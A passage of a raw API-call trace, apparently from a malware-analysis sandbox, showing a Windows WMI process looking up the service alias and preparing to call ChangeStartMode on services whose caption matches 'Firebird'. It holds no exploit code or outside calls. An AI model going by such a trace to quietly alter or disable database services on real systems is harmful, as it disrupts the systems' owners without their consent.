ppvObject=0x50f514*=0x8854a8) returned 0x0 [0113.738] GetCurrentThreadId () returned 0xed8 [0113.738] ??0CHString@@QAE@XZ () returned 0x50f494 [0113.738] IWbemClassObject:Get (in: This=0x8854a8, wszName="Namespace", lFlags=0, pVal=0x50f478*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50f478*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.738] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0113.738] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0113.738] IWbemClassObject:Get (in: This=0x8854a8, wszName="Locale", lFlags=0, pVal=0x50f478*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8671ec, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50f478*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.738] lstrlenW (lpString="ms_409") returned 6 [0113.738] lstrlenW (lpString="ms_409") returned 6 [0113.738] IWbemClassObject:Get (in: This=0x8854a8, wszName="User", lFlags=0, pVal=0x50f478*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8671ec, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50f478*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.738] IWbemClassObject:Get (in: This=0x8854a8, wszName="Password", lFlags=0, pVal=0x50f478*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50f478*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.738] IWbemClassObject:Get (in: This=0x8854a8, wszName="Server", lFlags=0, pVal=0x50f478*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50f478*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.738] lstrlenW (lpString=".") returned 1 [0113.738] lstrlenW (lpString=".") returned 1 [0113.739] IWbemClassObject:Get (in: This=0x8854a8, wszName="Authority", lFlags=0, pVal=0x50f478*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8671ec, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50f478*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.739] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.739] IUnknown:Release (This=0x8854a8) returned 0x1 [0113.739] GetCurrentThreadId () returned 0xed8 [0113.739] ??0CHString@@QAE@XZ () returned 0x50f484 [0113.739] IWbemClassObject:Get (in: This=0x8850e8, wszName="__RELPATH", lFlags=0, pVal=0x50f46c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50f46c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Service\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.739] GetCurrentThreadId () returned 0xed8 [0113.739] ??0CHString@@QAE@XZ () returned 0x50f400 [0113.739] ??0CHString@@QAE@PBG@Z () returned 0x50f3fc [0113.739] ??0CHString@@QAE@ABV0@@Z () returned 0x50f37c [0113.739] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0113.739] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xad8ae0 [0113.739] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0113.739] ?Left@CHString@@QBE?AV1@H@Z () returned 0x50f374 [0113.739] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x50f378 [0113.739] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x50f3fc [0113.739] ??1CHString@@QAE@XZ () returned 0x1 [0113.739] ??1CHString@@QAE@XZ () returned 0x1 [0113.739] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x50f370 [0113.739] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x50f37c [0113.739] ??1CHString@@QAE@XZ () returned 0x1 [0113.739] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0xad8b40 [0113.739] ?Find@CHString@@QBEHPBG@Z () returned 0x7 [0113.739] ?Left@CHString@@QBE?AV1@H@Z () returned 0x50f374 [0113.739] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x50f378 [0113.739] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x50f3fc [0113.739] ??1CHString@@QAE@XZ () returned 0x1 [0113.739] ??1CHString@@QAE@XZ () returned 0x1 [0113.739] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x50f370 [0113.739] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x50f37c [0113.739] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.739] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x74a66424 [0113.739] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.740] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0113.740] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0113.740] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0113.740] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x26 [0113.740] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"") returned 0x79 [0113.740] SysStringLen (param_1="\"") returned 0x1 [0113.740] IWbemServices:GetObject (in: This=0x8605f0, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Service\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x50f40c*=0x0, ppCallResult=0x0 | out: ppObject=0x50f40c*=0x885888, ppCallResult=0x0) returned 0x0 [0113.742] IWbemClassObject:Get (in: This=0x885888, wszName="Text", lFlags=0, pVal=0x50f3d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50f3d8*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x86f700*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x8679d8, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.742] SafeArrayGetLBound (in: psa=0x86f700, nDim=0x1, plLbound=0x50f3e8 | out: plLbound=0x50f3e8) returned 0x0 [0113.742] SafeArrayGetUBound (in: psa=0x86f700, nDim=0x1, plUbound=0x50f3ec | out: plUbound=0x50f3ec) returned 0x0 [0113.742] SafeArrayGetElement (in: psa=0x86f700, rgIndices=0x50f404, pv=0x50f3f0 | out: pv=0x50f3f0) returned 0x0 [0113.742] SysStringLen (param_1="Service application management. ") returned 0x20 [0113.742] IUnknown:Release (This=0x885888) returned 0x0 [0113.742] ??1CHString@@QAE@XZ () returned 0x1 [0113.742] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.742] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.742] lstrlenW (lpString="Service application management. ") returned 32 [0113.742] lstrlenW (lpString="Service application management. ") returned 32 [0113.742] IUnknown:Release (This=0x8850e8) returned 0x0 [0113.743] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.743] lstrlenW (lpString="PATH") returned 4 [0113.743] lstrlenW (lpString="WHERE") returned 5 [0113.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0113.743] lstrlenW (lpString="WHERE") returned 5 [0113.743] lstrlenW (lpString="WHERE") returned 5 [0113.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WHERE", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0113.743] lstrlenW (lpString="/") returned 1 [0113.743] lstrlenW (lpString="caption LIKE '%Firebird%'") returned 25 [0113.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%Firebird%'", cchCount1=25, lpString2="/", cchCount2=1) returned 3 [0113.743] lstrlenW (lpString="-") returned 1 [0113.743] lstrlenW (lpString="caption LIKE '%Firebird%'") returned 25 [0113.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%Firebird%'", cchCount1=25, lpString2="-", cchCount2=1) returned 3 [0113.743] lstrlenW (lpString="caption LIKE '%Firebird%'") returned 25 [0113.743] lstrlenW (lpString="caption LIKE '%Firebird%'") returned 25 [0113.743] lstrlenW (lpString="/") returned 1 [0113.743] lstrlenW (lpString="CALL") returned 4 [0113.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0113.743] lstrlenW (lpString="-") returned 1 [0113.743] lstrlenW (lpString="CALL") returned 4 [0113.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0113.743] lstrlenW (lpString="CALL") returned 4 [0113.743] lstrlenW (lpString="CALL") returned 4 [0113.743] lstrlenW (lpString="GET") returned 3 [0113.743] lstrlenW (lpString="CALL") returned 4 [0113.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0113.743] lstrlenW (lpString="LIST") returned 4 [0113.743] lstrlenW (lpString="CALL") returned 4 [0113.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0113.743] lstrlenW (lpString="SET") returned 3 [0113.743] lstrlenW (lpString="CALL") returned 4 [0113.743] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0113.743] lstrlenW (lpString="CREATE") returned 6 [0113.744] lstrlenW (lpString="CALL") returned 4 [0113.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0113.744] lstrlenW (lpString="CALL") returned 4 [0113.744] lstrlenW (lpString="CALL") returned 4 [0113.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0113.744] lstrlenW (lpString="/") returned 1 [0113.744] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="/", cchCount2=1) returned 3 [0113.744] lstrlenW (lpString="-") returned 1 [0113.744] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.744] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="-", cchCount2=1) returned 3 [0113.744] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.744] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.744] GetCurrentThreadId () returned 0xed8 [0113.744] ??0CHString@@QAE@XZ () returned 0x50ec8c [0113.744] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0113.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xad8b98, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0113.744] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0113.744] SysStringLen (param_1="SERVICE") returned 0x7 [0113.744] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0113.744] SysStringLen (param_1="'") returned 0x1 [0113.744] IWbemServices:GetObject (in: This=0x860690, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x50ec68*=0x0, ppCallResult=0x0 | out: ppObject=0x50ec68*=0x8850e8, ppCallResult=0x0) returned 0x0 [0113.749] lstrlenW (lpString="CALL") returned 4 [0113.749] lstrlenW (lpString="CALL") returned 4 [0113.749] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0113.749] IWbemClassObject:Get (in: This=0x8850e8, wszName="Verbs", lFlags=0, pVal=0x50ec20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ec20*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x86f6d0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x86f180, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.750] SafeArrayGetLBound (in: psa=0x86f6d0, nDim=0x1, plLbound=0x50ec30 | out: plLbound=0x50ec30) returned 0x0 [0113.750] SafeArrayGetUBound (in: psa=0x86f6d0, nDim=0x1, plUbound=0x50ec38 | out: plUbound=0x50ec38) returned 0x0 [0113.750] SafeArrayGetElement (in: psa=0x86f6d0, rgIndices=0x50ec40, pv=0x50ec74 | out: pv=0x50ec74) returned 0x0 [0113.750] IWbemClassObject:Get (in: This=0x886ab0, wszName="Name", lFlags=0, pVal=0x50ec10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.751] lstrlenW (lpString="StartService") returned 12 [0113.751] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.751] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StartService", cchCount2=12) returned 1 [0113.751] IUnknown:Release (This=0x886ab0) returned 0x1 [0113.751] SafeArrayGetElement (in: psa=0x86f6d0, rgIndices=0x50ec40, pv=0x50ec74 | out: pv=0x50ec74) returned 0x0 [0113.751] IWbemClassObject:Get (in: This=0x886fe8, wszName="Name", lFlags=0, pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.751] lstrlenW (lpString="StopService") returned 11 [0113.751] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.751] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="StopService", cchCount2=11) returned 1 [0113.751] IUnknown:Release (This=0x886fe8) returned 0x1 [0113.751] SafeArrayGetElement (in: psa=0x86f6d0, rgIndices=0x50ec40, pv=0x50ec74 | out: pv=0x50ec74) returned 0x0 [0113.751] IWbemClassObject:Get (in: This=0x887528, wszName="Name", lFlags=0, pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.751] lstrlenW (lpString="PauseService") returned 12 [0113.751] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.751] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="PauseService", cchCount2=12) returned 1 [0113.751] IUnknown:Release (This=0x887528) returned 0x1 [0113.751] SafeArrayGetElement (in: psa=0x86f6d0, rgIndices=0x50ec40, pv=0x50ec74 | out: pv=0x50ec74) returned 0x0 [0113.751] IWbemClassObject:Get (in: This=0x887a68, wszName="Name", lFlags=0, pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="PauseService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.751] lstrlenW (lpString="ResumeService") returned 13 [0113.751] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.751] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ResumeService", cchCount2=13) returned 1 [0113.751] IUnknown:Release (This=0x887a68) returned 0x1 [0113.751] SafeArrayGetElement (in: psa=0x86f6d0, rgIndices=0x50ec40, pv=0x50ec74 | out: pv=0x50ec74) returned 0x0 [0113.751] IWbemClassObject:Get (in: This=0x887fd0, wszName="Name", lFlags=0, pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.752] lstrlenW (lpString="InterrogateService") returned 18 [0113.752] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.752] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="InterrogateService", cchCount2=18) returned 1 [0113.752] IUnknown:Release (This=0x887fd0) returned 0x1 [0113.752] SafeArrayGetElement (in: psa=0x86f6d0, rgIndices=0x50ec40, pv=0x50ec74 | out: pv=0x50ec74) returned 0x0 [0113.752] IWbemClassObject:Get (in: This=0x8889d8, wszName="Name", lFlags=0, pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.752] lstrlenW (lpString="UserControlService") returned 18 [0113.752] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.752] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="UserControlService", cchCount2=18) returned 1 [0113.752] IUnknown:Release (This=0x8889d8) returned 0x1 [0113.752] SafeArrayGetElement (in: psa=0x86f6d0, rgIndices=0x50ec40, pv=0x50ec74 | out: pv=0x50ec74) returned 0x0 [0113.752] IWbemClassObject:Get (in: This=0x88c9e0, wszName="Name", lFlags=0, pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.752] lstrlenW (lpString="Create") returned 6 [0113.752] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.752] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Create", cchCount2=6) returned 1 [0113.752] IUnknown:Release (This=0x88c9e0) returned 0x1 [0113.752] SafeArrayGetElement (in: psa=0x86f6d0, rgIndices=0x50ec40, pv=0x50ec74 | out: pv=0x50ec74) returned 0x0 [0113.752] IWbemClassObject:Get (in: This=0x8906b0, wszName="Name", lFlags=0, pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.753] lstrlenW (lpString="Change") returned 6 [0113.753] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.753] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Change", cchCount2=6) returned 3 [0113.753] IUnknown:Release (This=0x8906b0) returned 0x1 [0113.753] SafeArrayGetElement (in: psa=0x86f6d0, rgIndices=0x50ec40, pv=0x50ec74 | out: pv=0x50ec74) returned 0x0 [0113.753] IWbemClassObject:Get (in: This=0x891338, wszName="Name", lFlags=0, pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.753] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.753] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.753] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ChangeStartMode", cchCount2=15) returned 2 [0113.753] GetCurrentThreadId () returned 0xed8 [0113.753] ??0CHString@@QAE@XZ () returned 0x50ea8c [0113.753] IWbemClassObject:Get (in: This=0x891338, wszName="Description", lFlags=0, pVal=0x50ea5c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ea5c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ChangeStartMode method modifies the StartMode of a service. It returns an integer value of 0 if the service was successfully modified, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.753] ??1CHString@@QAE@XZ () returned 0x74a66430 [0113.753] IWbemClassObject:Get (in: This=0x891338, wszName="Parameters", lFlags=0, pVal=0x50ec00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ec00*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x86f730*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x867978, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.753] IWbemClassObject:Get (in: This=0x891338, wszName="VerbType", lFlags=0, pVal=0x50eb98*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50eb98*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.753] IWbemClassObject:Get (in: This=0x891338, wszName="Derivation", lFlags=0, pVal=0x50eb80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50eb80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.754] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.754] lstrlenW (lpString="ChangeStartMode") returned 15 [0113.754] SafeArrayGetLBound (in: psa=0x86f730, nDim=0x1, plLbound=0x50ec34 | out: plLbound=0x50ec34) returned 0x0 [0113.754] SafeArrayGetUBound (in: psa=0x86f730, nDim=0x1, plUbound=0x50ec50 | out: plUbound=0x50ec50) returned 0x0 [0113.754] SafeArrayGetElement (in: psa=0x86f730, rgIndices=0x50ec54, pv=0x50ec60 | out: pv=0x50ec60) returned 0x0 [0113.754] IWbemClassObject:Get (in: This=0x8923d0, wszName="ParaId", lFlags=0, pVal=0x50ebb0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ebb0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.754] IWbemClassObject:Get (in: This=0x8923d0, wszName="Type", lFlags=0, pVal=0x50eb48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50eb48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.754] IWbemClassObject:Get (in: This=0x8923d0, wszName="Default", lFlags=0, pVal=0x50eb68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50eb68*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.754] GetCurrentThreadId () returned 0xed8 [0113.754] ??0CHString@@QAE@XZ () returned 0x50ea9c [0113.754] IWbemClassObject:Get (in: This=0x8923d0, wszName="Qualifiers", lFlags=0, pVal=0x50ea24*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ea24*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x86f310*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0x8678b8, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.754] SafeArrayGetLBound (in: psa=0x86f310, nDim=0x1, plLbound=0x50ea54 | out: plLbound=0x50ea54) returned 0x0 [0113.754] SafeArrayGetUBound (in: psa=0x86f310, nDim=0x1, plUbound=0x50ea68 | out: plUbound=0x50ea68) returned 0x0 [0113.754] SafeArrayGetElement (in: psa=0x86f310, rgIndices=0x50ea74, pv=0x50ea94 | out: pv=0x50ea94) returned 0x0 [0113.754] IWbemClassObject:Get (in: This=0x892688, wszName="Name", lFlags=0, pVal=0x50ea3c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ea3c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="In", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.754] IWbemClassObject:Get (in: This=0x892688, wszName="QualifierValue", lFlags=0, pVal=0x50ea14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x50ea14*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x86f4c0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x8679a8, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0113.754] SafeArrayGetLBound (in: psa=0x86f4c0, nDim=0x1, plLbound=0x50ea58 | out: plLbound=0x50ea58) returned 0x0 [0113.754] SafeArrayGetUBound (in: psa=0x86f4c0, nDim=0x1, plUbound=0x50ea38 | out: plUbound=0x50ea38) returned 0x0 [0113.754] lstrlenW (lpString="CIMTYPE") returned 7 [0113.754] lstrlenW (lpString="In") returned 2 [0113.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0113.754] lstrlenW (lpString="read") returned 4 [0113.754] lstrlenW (lpString="In") returned 2 [0113.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0113.754] lstrlenW (lpString="write") returned 5 [0113.754] lstrlenW (lpString="In") returned 2 [0113.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, 